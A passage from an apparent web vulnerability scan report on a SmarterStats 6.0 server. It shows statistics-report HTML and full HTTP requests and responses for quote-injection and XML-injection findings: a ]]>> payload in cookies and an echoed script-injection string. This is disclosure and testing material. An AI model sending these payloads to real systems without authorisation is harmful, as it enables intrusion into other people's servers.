<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fphpMyAdmin%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>phpMyAdmin<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent5'></div>
40</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent5'></div>
40</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fphpMyAdmin%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>phpMyAdmin<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent4'></div>
32</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fmysql%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>mysql<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent3'></div>
24</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fadmin%2fpMA%2fmain.php','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>admin<wbr /><span class='slash'>/</span>pMA<wbr /><span class='slash'>/</span>main.php</a></td>

<td class='ar percentcol rc'>
<div class='percent percent3'></div>
24</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Other Items (954)</td>
<td class='FooterTotal ar rc percentcolrc'>3,898</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>4,571</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>4</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">5xx - Server Errors</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="ResultCodes_5xx"> <div class='ReportChart'><img src="/Temp/55606390fe3f46d1a3c53fb35e90f25b.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>File</th><th class='ar rc'>Hits</th></tr></thead>
<tbody>
<tr >
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
673</td>
</tr>
<tr class="alt">
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>Telerik.Web.UI.WebResource.axd</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
18</td>
</tr>
<tr >
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>webresource.axd</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
17</td>
</tr>
<tr class="alt">
<td class='al lc'><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>favicon.ico</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>711</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>177</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Top File Types</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Top_FileTypes"> <div class='ReportChart'><img src="/Temp/93da743efbb443978311f033c93ef5f4.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Extension</th><th class='ar '>Hits</th><th class='ar '>Visits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>.axd</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
12,860</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
840</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
103</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>.aspx</td>

<td class='ar percentcol '>
<div class='percent percent3'></div>
1,533</td>
<td class='ar percentcol '>
<div class='percent percent4'></div>
131</td>
<td class='ar percentcol rc'>
<div class='percent percent18'></div>
75</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>.css</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
991</td>
<td class='ar percentcol '>
<div class='percent percent24'></div>
804</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>.bmp</td>

<td class='ar percentcol '>
<div class='percent percent1'></div>
755</td>
<td class='ar percentcol '>
<div class='percent percent15'></div>
492</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>.jpg</td>

<td class='ar percentcol '>
<div class='percent percent1'></div>
683</td>
<td class='ar percentcol '>
<div class='percent percent15'></div>
496</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
11</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>.ico</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
425</td>
<td class='ar percentcol '>
<div class='percent percent9'></div>
312</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>.txt</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
37</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
33</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>.pdf</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
15</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
12</td>
<td class='ar percentcol rc'>
<div class='percent percent1'></div>
6</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>.htm</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>.xml</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
6</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (1)</td>
<td class='FooterTotal ar percentcol'>5</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>0</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>17,319</td>
<td class='FooterTotal ar percentcol'>&nbsp;</td>
<td class='FooterTotal ar rc percentcolrc'>201</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>1,574</td>
<td class='FooterAverages ar percentcol'>&nbsp;</td>
<td class='FooterAverages ar rc percentcolrc'>18</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Entry Pages</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/5/2010 to 10/11/2010</td></tr></table></div></div><div class="Report" id="Path_EntryPages"> <div class='ReportChart'><img src="/Temp/2e5752f4fb284948b23574feda04dc4f.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='ac mine'>&nbsp;</th><th class='al '>Page</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
722</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fdefault.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>default.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
21</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fsales.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>sales.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2ftest.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>test.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2freport.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>report.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fcrossdomain.xml','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>crossdomain.xml</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fimages%2f','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>images<wbr /><span class='slash'>/</span></a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fria.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>ria.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='ac mine'><img alt="Data Mining" class="DrillDown" src="/App_Themes/Default/Images/16x16/Drilldown.gif" onclick="RadDataMine('%2fapptesting.aspx','Url','');"></td>

<td class='al '><a href="#" onclick='SiteUrlUndefined();' class='ReportLink'><wbr /><span class='slash'>/</span>apptesting.aspx</a></td>

<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=3>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>754</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=3>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>83</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5468|hiddenField|__VIEWSTATE|[ViewState value omitted]|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|73|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard%27&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

Request 2

POST /Client/frmViewReports.aspx?Custom=False&ReportType=Standard''&subReportName=CEO HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}
Content-Length: 6928

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24MPH%24btnShowReport&__EVENTTARGET=ctl00%24MPH%24btnShowReport&__EVENTARGUMENT=&__VIEWSTATE=[ViewState value omitted]&ctl00%24MPH%24RadStartDate=2010-10-03&ctl00_MPH_RadStartDate_dateInput_text=10%2F3%2F2010&ctl00%24MPH%24RadStartDate%24dateInput=2010-10-03-00-00-00&ctl00_MPH_RadStartDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadStartDate_calendar_SD=%5B%5D&ctl00_MPH_RadStartDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadStartDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24RadEndDate=2010-10-09&ctl00_MPH_RadEndDate_dateInput_text=10%2F9%2F2010&ctl00%24MPH%24RadEndDate%24dateInput=2010-10-09-00-00-00&ctl00_MPH_RadEndDate_dateInput_ClientState=%7B%22enabled%22%3Atrue%2C%22emptyMessage%22%3A%22%22%2C%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00_MPH_RadEndDate_calendar_SD=%5B%5D&ctl00_MPH_RadEndDate_calendar_AD=%5B%5B1800%2C1%2C1%5D%2C%5B2200%2C1%2C1%5D%2C%5B2010%2C10%2C9%5D%5D&ctl00_MPH_RadEndDate_ClientState=%7B%22minDateStr%22%3A%221%2F1%2F1800%200%3A0%3A0%22%2C%22maxDateStr%22%3A%221%2F1%2F2200%200%3A0%3A0%22%7D&ctl00%24MPH%24hfDMFilename=&ctl00%24MPH%24hfDMReport=&ctl00_MPH_mnuTable_rowCount_10_CB=on&__ASYNCPOST=true&

Response 2

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:14:43 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 7329

1|#||4|625|updatePanel|ctl00_BPH_UpdatePanel2|
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       |11|updatePanel|ctl00_UpdatePanel1|
               
           |312|updatePanel|ctl00_MPH_UpdatePanel1|
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               |119|updatePanel|ctl00_MPH_UP1|
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5424|hiddenField|__VIEWSTATE|[ViewState value omitted]|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|76|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard%27%27&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

3. XML injection
There are 20 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose that the relevant input serves within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


3.1. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STHashCookie cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The STHashCookie cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STHashCookie cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}]]>>; STTTState=
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:47 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.2. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [STTTState cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The STTTState cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the STTTState cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}; STTTState=]]>>
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:49 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [SelectedLanguage cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The SelectedLanguage cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the SelectedLanguage cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=rhBSoSZ3uKmx8z+qIBCGVhb6e6qOMott; SelectedLanguage=]]>>; STHashCookie={"CountsGuid":"1226267292","TopBarSection":"UserDataMining"}; STTTState=
Content-Length: 15

{"siteIds":[1]}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 01:02:42 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Content-Length: 726
Connection: Close

{"d":[{"__type":"SSWeb.Admin.frmSites+SiteStatusData","currently":"Gathering Statistics - Closing statistics processor","siteId":1,"status":"Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\\WebLogs\\1\\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e\u003cbr\u003e"}]}

3.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSites.aspx/SiteInfoLookup [loginsettings cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSites.aspx/SiteInfoLookup

Issue detail

The loginsettings cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the loginsettings cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

POST /Admin/frmSites.aspx/SiteInfoLookup HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
